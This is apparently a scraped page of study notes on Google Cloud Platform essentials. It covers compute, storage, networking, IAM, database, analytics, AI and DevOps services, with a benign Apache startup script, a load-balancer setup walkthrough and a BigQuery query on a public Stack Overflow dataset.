GCP Cloud Shell is an interactive shell environment for GCP, accessible from any web browser and preloaded with the gcloud command-line utility. It is backed by a GCE virtual machine (provisioned with 5 GB of persistent disk storage and a Debian environment) and has built-in preview functionality, without the need for tunneling or other workarounds.
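
Typical first commands in Cloud Shell might look like this (the project ID is a hypothetical placeholder):

```bash
gcloud config list                        # show active account and project
gcloud projects list                      # list projects you can access
gcloud config set project my-project-id   # switch to a project (hypothetical ID)
```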

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#2-compute-services","title":"2. Compute Services","text":"

              Code is deployed and executed in one of the compute services:

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#21-app-engine","title":"2.1. App Engine","text":"

Launched in 2008, App Engine is one of Google's first compute services (PaaS). It's a fully managed platform for deploying web apps at scale, with support for multiple languages. It's available in two environments:

              • Standard: Applications run in a sandbox.
              • Flexible: You have more control on packages and environments. Applications run on docker containers, which are in use to deploy but also to scale apps.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#22-compute-engine-gce","title":"2.2. Compute Engine (GCE)","text":"

Google Compute Engine (GCE) enables Linux and Windows VMs to run on Google's global infrastructure. VMs are based on machine types with varied CPU and RAM configurations.

If you need VM data to persist, attach additional storage such as standard or SSD disks. Otherwise, when the VM is deleted you will lose all configurations and setup.

VMs are charged a minimum of 1 minute and in 1-second increments after that. Sustained use discounts are offered for running VMs for a significant portion of the billing month. Committed use discounts are offered for purchases based on 1-year or 3-year contracts.
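
A minimal gcloud sketch of launching a VM; the name, zone, machine type, and image family are hypothetical choices:

```bash
# Launch a small Debian VM on Compute Engine.
gcloud compute instances create my-vm \
  --zone=us-central1-a \
  --machine-type=e2-medium \
  --image-family=debian-12 \
  --image-project=debian-cloud
```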

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#23-kubernetes-engine","title":"2.3. Kubernetes Engine","text":"
• GKE is a managed environment for deploying containerized applications managed by Kubernetes. Kubernetes originated at Google but is now an open source project under the Cloud Native Computing Foundation.
              • Kubernetes has a control plane and worker node (or multiple).
• GKE provisions worker nodes as GCE VMs. Google manages the control plane (and the master nodes), which is why GKE is called a managed environment.
              • Node pools enable mixing and matching different VM configurations.
              • The service is tightly integrated with GCP resources such as networking, storage, and monitoring.
• GKE infrastructure is monitored by Stackdriver, the built-in monitoring and tracing platform.
              • Auto scaling, automatic upgrades, and node auto-repair are some of the unique features of GKE.
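
A minimal gcloud sketch of creating a cluster and wiring up kubectl; the cluster name, zone, and node count are hypothetical:

```bash
# Create a three-node GKE cluster, then fetch kubectl credentials for it.
gcloud container clusters create my-cluster \
  --zone=us-central1-a \
  --num-nodes=3

gcloud container clusters get-credentials my-cluster --zone=us-central1-a
```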
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#24-cloud-functions","title":"2.4. Cloud Functions","text":"
• Cloud Functions is a serverless execution environment for building and connecting cloud services.
              • Serverless compute environments execute code in response to an event.
              • Cloud Functions supports JavaScript, Python, and Go.
              • GCP events fire a Cloud Function through a trigger.
              • An example event includes adding an object to a storage bucket.
              • Trigger connects the event to the function.
              • This is FaaS, Function as a Service.
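
A hedged sketch of deploying a bucket-triggered function with gcloud; the function name, bucket, runtime, and entry point are hypothetical, and a main.py defining handler(event, context) is assumed to exist in the current directory:

```bash
# Deploy a function fired whenever an object is added to a bucket.
gcloud functions deploy process_upload \
  --runtime=python39 \
  --trigger-bucket=my-upload-bucket \
  --entry-point=handler
```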
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#3-storage-services","title":"3. Storage Services","text":"
              • Storage services add persistence and durability to applications
              • Storage services are classified into three types:

                • Object storage
                • Block storage
                • File system
              • GCP storage services can be used to store:

              • Unstructured data
              • Folders and Files
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#31-google-cloud-storage","title":"3.1. Google Cloud Storage","text":"
              • Unified object storage for a variety of applications.
• Applications can store and retrieve objects (typically through a single API).
              • GCS can scale to exabytes of data.
              • GCS is designed for 99.999999999% durability.
              • GCS can be used to store high-frequency and low-frequency access of data.
              • Data can be stored within a single region, dual-region, or multi-region.
• There are three default storage classes for the data: Standard, Nearline, and Coldline.
• Launching GCS: when creating a storage entity in GCP, you create buckets, which are containers for folders and storage objects. Folders may contain files, so buckets are the highest-level container in the GCS hierarchy. For encryption, you can decide between a Google-managed key and a customer-managed key. A retention policy and labels can also be added when creating a storage entity. After that, you can create folders and allocate files in them.
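
A minimal gsutil sketch of the bucket workflow (the bucket name is hypothetical and must be globally unique):

```bash
# Create a bucket, upload an object, and list the bucket's contents.
gsutil mb -l us-central1 gs://my-unique-bucket-name/
gsutil cp report.pdf gs://my-unique-bucket-name/reports/
gsutil ls -r gs://my-unique-bucket-name/
```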
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#32-persistent-disks","title":"3.2. Persistent Disks","text":"
              • PD provides reliable block storage for GCE VMs.
              • Disks are independent of Compute Engine VMs, which means they can have a different lifecycle.
              • Each disk can be up to 64TB in size.
• PDs can have one writer and multiple readers, which is quite unique to GCP. You can attach a disk to one VM for read-write access while multiple other VMs read the same data in read-only mode: one VM acts as the writer and all other VMs act as readers. This opens up many opportunities for distributed applications with centralized data access (see the sketch after this list).
              • Supports both SSD and HDD storage options.
              • SSD offers best throughput for I/O intensive applications.
              • PD is available in three storage types:
                • Zonal.
                • Regional.
                • Local.
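
A sketch of the one-writer, many-readers pattern with gcloud; the disk and VM names, zone, and size are hypothetical:

```bash
# Create a disk, attach it read-write to one VM and read-only to another.
gcloud compute disks create shared-data --size=200GB --zone=us-central1-a

gcloud compute instances attach-disk writer-vm \
  --disk=shared-data --mode=rw --zone=us-central1-a

gcloud compute instances attach-disk reader-vm-1 \
  --disk=shared-data --mode=ro --zone=us-central1-a
```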
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#33-google-cloud-filestore","title":"3.3. Google Cloud Filestore","text":"
              • Managed file storage service traditionally for legacy applications.
              • Delivers NAS-like filesystem interface and a shared filesystem.
              • Centralized, highly-available filesystem for GCE and GKE.
              • Exposed as a NFS fileshare with fixed export settings and default Unix permissions.
              • Filestore file shares are available as mount points in GCE VMs.
              • On-prem applications using NAS take advantage of Filestore.
              • Filestore has built-in zonal storage redundancy for data availability.
              • Data is always encrypted while in transit.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#4-network-services","title":"4. Network Services","text":"
              • Network services are one of the key building blocks of cloud.
              • GCP leverages Google\u2019s global network for connectivity.
• Customers can choose between standard and premium network tiers. The Standard tier leverages a selection of ISP-based internet backbones for connectivity (which is cheaper), while the Premium tier routes traffic over Google's premium backbone. GCP uses the Premium tier as the default option.
              • Load balancers route the traffic evenly to multiple endpoints.
              • Virtual Private Cloud (VPC) offers private and hybrid networking.
              • Customers can extend their data center to GCP through hybrid connectivity.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#41-load-balancers","title":"4.1. Load Balancers","text":"
              • Load balancer distributes traffic across multiple GCE VMs in a single or multiple regions.
              • There are two types of GCP load balancers:
                • HTTP(S) load balancer, which provides global load balancing.
  • Network load balancer, which balances regional TCP and UDP traffic within the same region.
• Both types can be configured as internal or external load balancers.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#configure-is-a-couple-of-vms-deployed-in-a-region-connected-to-a-load-balancer","title":"Configure is a couple of VMs deployed in a region connected to a load balancer","text":"
              • From GCP web dashboard, go to Compute Engine, then Instance Templates.
• Select machine type, disk image, and allow HTTP and HTTPS in the firewall configuration, since we are launching a web server. Configure automation so the server starts at boot by adding the following script:
```bash
# Add the below script while creating the instance template

#! /bin/bash
apt-get update
apt-get install -y apache2
cat <<EOF > /var/www/html/index.html
<html><body><h1>Hello from $(hostname)</h1>
</body></html>
EOF
```
              • Create the template.
              • Now go to Instance group for setting up the deployment. Configure multiple zones, select the instance template (the one you created before) and the number of instances to deploy. Create a Health Check. Launch the instance group and in a few minutes you will have the 2 web servers (Go to VM instances to see them).
              • Go to Network section, then Load balancing and click on create load balancer, and follow the creation tunnel.
              • The first step is creating a backend configuration. So the backend configuration will ensure that we have a set of resources responsible for serving the traffic. Options to configure there:

                • Network endpoint groups // Or // Instance groups : choose the backend type as the instance group and choose the web server instance group we have launched in the previous step. Port is 80. That is the default port on which Apache is listening.
• Balancing mode: traffic can be routed based on CPU utilization or requests per second. If you are not going to send a lot of traffic, choose rate.
                • The maximum RPS, 100.
• Associate this backend with the health check created earlier. This health check is the checkpoint the load balancer uses to decide whether to route traffic to an instance. If the health check fails for one of the instances, the load balancer gracefully sends requests to the other instance, enhancing the user experience: users only see output coming from healthy instances.
• The second step is setting up host and path rules; since there are not multiple endpoints, leave the defaults.

              • Third step, Front end configuration. The front end is basically how the consumer or the client of your application sees the endpoint. Configure it:
                • Provide a name.
                • Protocol is HTTP.
• Network service tier: Premium.
                • IPv4, it's an ephemeral IP address.
              • Fourth step, review settings.

In about five minutes, the load balancer will be fully functional, meaning it can route traffic to any of the instances in the backend group, which is based on the instance template we created. By accessing the load balancer's IP on port 80, each request may be served by a different machine.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#42-virtual-private-cloud-vpc","title":"4.2. Virtual Private Cloud (VPC)","text":"
              • VPC is a software defined network providing private networking for VMs.
              • VPC network is a global resource with regional subnets.
              • Each VPC is logically isolated from each other.
              • Firewall rules allow or restrict traffic within subnets. Default option is deny.
• Resources within a VPC communicate via IPv4 addresses, and there is a DNS service within the VPC that provides name resolution.
              • VPC networks can be connected to other VPC networks through VPC peering.
              • VPC networks are securely connected in hybrid environments using Cloud VPN or Cloud Interconnect.
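
A minimal gcloud sketch of a custom-mode VPC with a subnet and a firewall rule (names and ranges are hypothetical):

```bash
# Create a custom-mode VPC, a regional subnet, and an allow-HTTP firewall rule.
gcloud compute networks create my-vpc --subnet-mode=custom

gcloud compute networks subnets create web-subnet \
  --network=my-vpc --region=us-central1 --range=10.0.1.0/24

gcloud compute firewall-rules create allow-http \
  --network=my-vpc --allow=tcp:80
```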
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#43-hybrid-connectivity","title":"4.3. Hybrid Connectivity","text":"
              • Hybrid connectivity extends local data center to GCP.
              • Three GCP services enable hybrid connectivity:
                • Cloud Interconnect: Cloud Interconnect extends on-premises network to GCP via Dedicated or Partner Interconnect.
                • Cloud VPN: Cloud VPN connects on-premises environment to GCP securely over the internet through IPSec VPN.
                • Peering: Peering enables direct access to Google Cloud resources with reduced Internet egress fee
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#5-identity-access-management","title":"5. Identity & Access Management","text":"
• IAM controls access by defining who (identity) has what access (role) for which resource: members (who), roles (what), and permissions (which).
              • Cloud IAM is based on the principle of least privilege.
              • An IAM policy binds identity to roles which contains permissions.

              Where do you use IAM?

• To share GCP resources with fine-grained control.
• Selectively allow/deny permissions to individual resources.
• Define custom roles that are specific to a team/organization.
• Enable authentication of applications through service accounts.
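
For example, a hedged gcloud sketch of binding a role to a member at project scope (the project ID and user are hypothetical):

```bash
# Grant a user a predefined role on a project.
gcloud projects add-iam-policy-binding my-project-id \
  --member="user:alice@example.com" \
  --role="roles/storage.objectViewer"
```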

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#51-cloud-iam-identity","title":"5.1. Cloud IAM Identity","text":"

A Google account is a Cloud IAM user, so anyone with a Gmail or Google account is visible as a Cloud IAM user.

              A Service account is a special type of user. It's meant for applications to talk to GCP resources.

              A Google group is also a valid user or a member in Cloud IAM because it represents a logical entity that is a collection of users.

              A G Suite domain like yourorganization.com is also a valid user or a member. You can assign permissions to an entire G Suite domain.

If you are not part of Google, you can use the Cloud Identity service to create a Cloud Identity domain, which is also a valid Cloud IAM user.

              And \"allAuthenticatedUsers\" is also an entity that allows you to assign permissions to all users authenticated through Google's authentication system.

              Last, \"allUsers\" assigns permissions even to anonymous users.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#52-cloud-iam-permissions","title":"5.2. Cloud IAM Permissions","text":"
• Permissions determine the operations that can be performed on a resource (launch an instance, upload an object to a storage bucket, etc.).
              • Correspond 1:1 with REST methods of GCP resources. GCP is based on a collection of APIs.
              • Each GCP resource exposes REST APIs to perform operations.
              • Permissions are directly mapped to each REST API.
                • Publisher.Publish() -> pubsub.topics.publish.
• Permissions cannot be assigned directly to members/users, only to a role. You group multiple permissions into a role and assign that role to a member.
              • One or more permissions are assigned to an IAM Role
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#53-cloud-iam-roles","title":"5.3. Cloud IAM Roles","text":"

              Roles are a logical grouping of permissions.

              • Primitive roles:
                • Owner: unlimited access to a resource.
                • Editor.
                • Viewer.
• Predefined roles that bundle a set of operations typically associated with a resource type. Every object in GCP has a set of predefined roles:
                • roles/pubsub.publisher
                • roles/compute.admin
                • roles/storage.objectAdmin
              • Custom roles:
                • Collection of assorted set of permissions.
                • Fine-grained access to resources.
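
A minimal sketch of creating a custom role from individual permissions with gcloud; the role ID, title, and project are hypothetical:

```bash
# Define a custom role that can only start and stop instances.
gcloud iam roles create instanceOperator \
  --project=my-project-id \
  --title="Instance Operator" \
  --permissions=compute.instances.start,compute.instances.stop
```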
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#54-key-elements-of-cloud-iam","title":"5.4. Key Elements of Cloud IAM","text":"
• Resource – Any GCP resource
                • Projects
                • Cloud Storage Buckets
                • Compute Engine Instances
                • ...
              • Permissions - Determines operations allowed on a resource
  • Syntax for calling permissions:

```
<service>.<resource>.<verb>
- pubsub.subscriptions.consume
- compute.instances.insert
```
• Roles – A collection of permissions

                • Compute.instanceAdmin
                  • compute.instances.start
                  • compute.instances.stop
                  • compute.instances.delete
    • ….
• Users – Represents an identity

                • Google Account
                • Google Group
                • G Suite Domain
  • …
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#55-service-accounts","title":"5.5. Service Accounts","text":"
• A special Google account that belongs to an application or VM; it doesn't represent a human user.
• A service account is identified by a unique email address assigned automatically by GCP; you don't have control over it.
• Service accounts are associated with key pairs used for authentication. This key is the token that identifies the application.
              • Two types of service accounts:
                • User managed, which can be associated with a role.
                • Google managed.
              • Each service account is associated with one or more roles.
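
A hedged gcloud sketch of the user-managed service account workflow (the project ID and names are hypothetical):

```bash
# Create a service account, grant it a role, and issue a key for it.
gcloud iam service-accounts create app-sa --display-name="App service account"

gcloud projects add-iam-policy-binding my-project-id \
  --member="serviceAccount:app-sa@my-project-id.iam.gserviceaccount.com" \
  --role="roles/pubsub.publisher"

gcloud iam service-accounts keys create key.json \
  --iam-account=app-sa@my-project-id.iam.gserviceaccount.com
```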
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#6-database-services","title":"6. Database Services","text":"
              • GCP has managed relational and NoSQL database services.
              • Traditional web and line-of-business apps may use RDBMS.
              • Modern applications rely on NoSQL databases.
• Web-scale, distributed applications need multi-region databases.
• An in-memory database is used to accelerate the performance of apps.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#61-google-cloud-sql","title":"6.1. Google Cloud SQL","text":"
              • One of the most common services in GCP.
• Fully managed RDBMS service that simplifies setting up, maintaining, managing, and administering database instances.
• Cloud SQL supports three types of RDBMS (Relational Database Management Systems):
                • MySQL
                • PostgreSQL
                • Microsoft SQL Server (Preview)
              • A managed alternative to running RDBMS in VMs.
              • Cloud SQL delivers scalability, availability, security, and reliability of database instances.
              • Cloud SQL instances may be launched within VPC for additional security.
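
A minimal gcloud sketch of launching a managed MySQL instance (the instance name, tier, and region are hypothetical):

```bash
# Create a small managed MySQL 8.0 instance.
gcloud sql instances create my-db \
  --database-version=MYSQL_8_0 \
  --tier=db-f1-micro \
  --region=us-central1
```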
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#62-google-clod-bigtable","title":"6.2. Google Clod Bigtable","text":"
              • Petabyte-scale, managed NoSQL database service.
              • Sparsely populated table that can scale to billions of rows and thousands of columns.
              • Storage engine for large-scale, low-latency applications.
              • Ideal for throughput-intensive data processing and analytics.
• An alternative to running the Apache HBase column-oriented database in VMs.
              • Acts as a storage engine for MapReduce operations, stream processing, and machine-learning applications
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#63-google-cloud-spanner","title":"6.3. Google Cloud Spanner","text":"
              • Managed, scalable, relational database service for regional and global application data.
              • Scales horizontally across rows, regions, and continents.
• Brings the best of relational and NoSQL databases.
              • Supports ACID transactions and ANSI SQL queries.
              • Data is replicated synchronously with globally strong consistency.
              • Cloud Spanner instances run in one of the three region types:
                • Read-write
                • Read-only
                • Witness
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#64-google-cloud-memorystore","title":"6.4. Google Cloud Memorystore","text":"
              • A fully-managed in-memory data store service for Redis.
• Ideal for application caches that provide sub-millisecond data access.
              • Cloud Memorystore can support instances up to 300 GB and network throughput of 12 Gbps.
              • Fully compatible with Redis protocol.
              • Promises 99.9% availability with automatic failover.
              • Integrated with Stackdriver for monitoring.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#7-data-and-analytics-services","title":"7. Data and Analytics Services","text":"
              • Data analytics include ingestion, collection, processing, analyzing, visualizing data.
              • GCP has a comprehensive set of analytics services.
              • Cloud Pub/Sub is typically used for ingesting data at scale, whether it is telemetry data coming from sensors or logs coming from your applications and infrastructure.
              • Cloud Dataflow can process data in real-time or batch mode.
• Cloud Dataproc is a Big Data service for running Hadoop and Spark jobs. These are typically MapReduce-style workloads over large data sets holding historical data, or data stored in traditional databases.
• BigQuery is the data warehouse in the cloud. Many Google Cloud customers rely on BigQuery for analyzing historical data and deriving insights from it.
              • Cloud Datalab is used for analyzing and visualizing data
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#71-google-cloud-pub-sub","title":"7.1. Google Cloud Pub / Sub","text":"
              • Managed service to ingest data at scale.
• Based on the publish/subscribe pattern: a set of publishers send messages to a topic, a set of subscribers subscribe to that topic, and Pub/Sub provides the infrastructure for publishers and subscribers to reliably exchange messages.
              • Global entry point to GCP-based analytics services.
              • Acts as a simple and reliable staging location for data. Pub/Sub is not meant to be a durable data store.
              • Tightly integrated with services such as Cloud Storage and Cloud Dataflow.
• Supports at-least-once delivery with synchronous, cross-zone message replication. This gives a highly reliable delivery mechanism with built-in redundancy: messages are not lost when sent via the Cloud Pub/Sub infrastructure.
              • Comes with end-to-end encryption, IAM, and audit logging.
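
A minimal gcloud sketch of the publish/subscribe round trip (topic and subscription names are hypothetical):

```bash
# Create a topic and a subscription, publish a message, then pull it.
gcloud pubsub topics create telemetry
gcloud pubsub subscriptions create telemetry-sub --topic=telemetry
gcloud pubsub topics publish telemetry --message="hello from a sensor"
gcloud pubsub subscriptions pull telemetry-sub --auto-ack --limit=1
```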
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#72-google-cloud-dataflow","title":"7.2. Google Cloud Dataflow","text":"
              • Managed service for transforming and enhancing data in stream and batch modes: Cloud Dataflow is meant for transforming and enhancing data, either coming via real-time streams or data stored in Cloud Storage, which is processed in batch mode.
• Based on the Apache Beam open source project: Google is one of the key contributors to Apache Beam, and Cloud Dataflow is a commercial implementation of it that supports a serverless approach, automating provisioning and management.
• Serverless approach: you don't need to provision resources and scale them manually. Start streaming data into Dataflow (for example via Pub/Sub), and it automatically processes the data and scales the infrastructure based on the inbound stream.
              • Inbound data can be queried, processed, and extracted for target environment.
              • Tightly integrated with Cloud Pub/Sub, BigQuery, and Cloud Machine Learning.
              • Cloud Dataflow connector for Kafka makes it easy to integrate Apache Kafka.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#73-google-cloud-dataproc","title":"7.3. Google Cloud Dataproc","text":"
              • Managed Apache Hadoop and Apache Spark cluster environments.
              • Automated cluster management.
• Clusters can be quickly created and resized from three to hundreds of nodes.
              • Move existing Big Data projects to GCP without redevelopment.
              • Frequent updates to Spark, Hadoop, Pig, and Hive and other components of the Apache ecosystem.
              • Integrates with other GCP services like Cloud Dataflow and BigQuery

In a typical Dataproc pipeline, data enters through Pub/Sub, gets transformed through Dataflow, and gets processed with Dataproc, usually in the form of a MapReduce job written for Apache Hadoop or Apache Spark. The output of Dataproc can be stored in BigQuery, or it can go to Google Cloud Storage.
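A minimal gcloud sketch of that lifecycle (the cluster name and region are hypothetical; the SparkPi example jar ships with Dataproc images):

# Create a small cluster, submit the SparkPi example, then resize the cluster\ngcloud dataproc clusters create my-cluster --region=us-central1 --num-workers=2\ngcloud dataproc jobs submit spark --cluster=my-cluster --region=us-central1 --class=org.apache.spark.examples.SparkPi --jars=file:///usr/lib/spark/examples/jars/spark-examples.jar -- 1000\ngcloud dataproc clusters update my-cluster --region=us-central1 --num-workers=5\n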

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#74-google-cloud-datalab","title":"7.4. Google Cloud DataLab","text":"
              • Interactive tool for data exploration, analysis, visualization, and machine learning.
              • Runs on Compute Engine and may connect to multiple cloud services.
              • Built on open source Jupyter Notebooks platform.
• Enables analysis of data coming from BigQuery, Cloud ML Engine, and Cloud Storage.
              • Supports Python, SQL, and JavaScript languages.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#75-bigquery","title":"7.5. BigQuery","text":"
• Serverless, scalable cloud data warehouse: Google BigQuery is one of the early analytic services added to GCP. It is a very powerful, very popular service used by enterprise customers to analyze data.
              • Has an in-memory BI Engine and machine learning built in, so as you query data from BigQuery you can apply machine learning algorithms that can perform predictive analytics right out of the box.
• Supports the standard ANSI SQL:2011 dialect for querying. You don't need to learn new or domain-specific languages to deal with BigQuery; you can use familiar SQL queries that support inner joins, outer joins, GROUP BY and WHERE clauses to extract and analyze data from existing data stores.
              • Federated queries can process external data sources. BigQuery can pull the data from all of these sources and can perform one single query that will automatically join and do group by clauses so you get a unified view of the dataset:
                • Cloud Storage.
                • Cloud Bigtable.
                • Spreadsheets (Google Drive).
              • Automatically replicates data to keep a seven-day history of changes.
              • Supports data integration tools like Informatica and Talend.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#case-use","title":"Case use","text":"

              Open BigQuery and open a public dataset. Select Stack Overflow. We will try to extract the number of users in Stack Overflow with gold badges and how many days it took them to get there.

              # Run the below SQL statement in BigQuery \n\nSELECT badge_name AS First_Gold_Badge,  \n       COUNT(1) AS Num_Users, \n       ROUND(AVG(tenure_in_days)) AS Avg_Num_Days \nFROM \n( \n  SELECT  \n    badges.user_id AS user_id, \n    badges.name AS badge_name, \n    TIMESTAMP_DIFF(badges.date, users.creation_date, DAY) AS tenure_in_days, \n    ROW_NUMBER() OVER (PARTITION BY badges.user_id \n                       ORDER BY badges.date) AS row_number \n  FROM  \n    `bigquery-public-data.stackoverflow.badges` badges \n  JOIN \n    `bigquery-public-data.stackoverflow.users` users \n  ON badges.user_id = users.id \n  WHERE badges.class = 1  \n)  \nWHERE row_number = 1 \nGROUP BY First_Gold_Badge \nORDER BY Num_Users DESC \nLIMIT 10 \n

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#8-ai-and-ml-services","title":"8. AI and ML Services","text":"
              • AI Building Blocks provide AI through simple REST API calls.
              • Cloud AutoML enables training models on custom datasets.
              • AI Platform provides end-to-end ML pipelines on-premises and cloud.
              • AI Hub is a Google hosted repository to discover, share, and deploy ML models.
• Google Cloud Platform offers a comprehensive set of ML and AI services for beginners as well as advanced AI engineers.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#81-ai-building-blocks","title":"8.1. AI Building Blocks","text":"

GCP AI building blocks expose a set of APIs that can deliver AI capabilities without training models or writing complex pieces of code. The GCP AI building blocks are structured into:

• Sight, which delivers vision- and video-based intelligence.
• Conversation, which is all about text-to-speech and speech-to-text. It also includes Dialogflow, which powers some of the capabilities seen in Google Home, Google Assistant, and other conversational user experiences.
• Language, which covers translation and natural language, i.e., revealing the structure and meaning of text through machine learning.
• Structured data, which can be used to perform regression, classification, and prediction.
• AutoML Tables, a service meant for performing regression or classification on your structured data.
• Recommendations AI, which delivers personalized product recommendations at scale.
• Cloud Inference API, which is all about running large-scale correlations over time-series datasets.

These techniques can all be used directly by consuming the APIs. For example, with Vision you can perform object detection or image classification by simply uploading or sending an image to the API: it comes back with all the objects detected in that image, or it can classify the image shown in the input. Similarly, when you send text to the Text-to-Speech API, it comes back with an audio file that speaks the submitted text. These AI building blocks are very useful for infusing AI and intelligence into your applications.
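As a quick, hedged example of consuming a building block from the CLI (the image path is illustrative):

# Label detection on a local image\ngcloud ml vision detect-labels ./my-image.jpg\n\n# Text detection (OCR) on the same image\ngcloud ml vision detect-text ./my-image.jpg\n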

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#82-automl","title":"8.2. AutoML","text":"
• Cloud AutoML enables training high-quality models specific to a business problem. What if you want to train a custom model but do not want to write complex code about artificial neural networks? That is where Google Cloud AutoML comes into the picture.
              • Custom machine learning models without writing code.
              • Based on Google\u2019s state-of-the-art machine learning algorithms.
              • AutoML Services.
                • Sight.
                  • Vision.
                  • Video Intelligence.
                • Language.
                  • Natural Language.
                  • Translation.
• Structured Data.
                  • Tabular data.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#83-ai-platform","title":"8.3. AI Platform","text":"
              • Covers the entire spectrum of machine learning pipelines.
              • Built on Kubeflow, an open source ML project based on Kubernetes.
              • Includes tools for data preparation, training, and inference

Just like a data processing pipeline, an ML processing pipeline is a comprehensive set of stages combined into a pipeline, and Kubeflow is the project that simplifies creating these multi-stage pipelines, covering the typical phases from data preparation through training to inference.

Google AI Platform gives us scalable infrastructure and a framework to deal with this pipeline and its multiple stages. Google AI Platform is not confined to the cloud: customers running on-premises Kubernetes infrastructure can deploy AI Platform on-prem and seamlessly extend it to the cloud, which means they can train on-prem but deploy in the cloud, or train in the cloud but deploy the models on-prem. Kubeflow is the underlying framework and infrastructure that supports the entire processing pipeline, whether on-prem or in the public cloud.

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#84-ai-hub","title":"8.4. AI Hub","text":"
              • Hosted repository of plug-and-play AI components.
              • Makes it easy for data scientists and teams to collaborate.
              • AI Hub can host private and public content.
• AI Hub includes:
                • Kubeflow Pipeline components.
                • Jupyter Notebooks.
                • TensorFlow modules.
• VM Images.
                • Trained models.
                • \u2026
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#9-devops-services","title":"9. Devops Services","text":"
              • DevOps Services provide tools and frameworks for automation.
              • Cloud Source Repositories store and track source code.
              • Cloud Build automates continuous integration and deployment.
              • Container Registry acts as the central repository for storing, securing, and managing Docker container images.
              • IDE and tools integration enables developer productivity.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#91-google-cloud-source-repositories","title":"9.1. Google Cloud Source Repositories","text":"
              • Acts as a scalable, private Git repository.
• Extends the standard Git workflow to Cloud Build, Cloud Pub/Sub, and Compute services: the advantage of using Google Cloud Source Repositories is keeping the source code very close to your deployment target, be it Compute Engine, App Engine, Cloud Functions, or Kubernetes Engine.
              • Unlimited private Git repositories that can mirror code from Github and Bitbucket repos.
              • Triggers to automatically build, test, and deploy code.
              • Integrated regular expression-based code search.
              • Single source of code for deployments across GCE, GAE, GKE, and Functions.

              You should consider cloud source repos when you want to manage the life cycle of an application within GCP, all the way from storing the code to deploying and iterating over your code multiple times.
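A hedged sketch of that lifecycle (the repository name is hypothetical):

gcloud source repos create my-repo\ngcloud source repos clone my-repo\ncd my-repo\n# ...add and commit code, then push; pushes can trigger Cloud Build\ngit push origin master\n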

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#92-google-cloud-build","title":"9.2. Google Cloud Build","text":"
              • Managed service for source code build management.
• The CI/CD tool of Google Cloud Platform: Cloud Build is the CI/CD tool for building code stored either in Cloud Source Repositories or in an external Git repository.
              • Supports building software written in any language.
              • Custom workflow to deploy across multiple target environments.
              • Tight integration with Cloud Source Repo, GitHub, and Bitbucket, which is going to be the source for your code repositories and they act as the initial phase for triggering the entire CI/CD pipeline.
              • Supports native Docker integration with automated deployment to Kubernetes and GKE.
• Identifies vulnerabilities through efficient OS package scanning, in addition to packaging and deploying source code.

              Google Cloud Build takes the source code stored either in source code repo of GCP or Bitbucket, GitLab or GitHub and creates the integration and deployment pipeline.
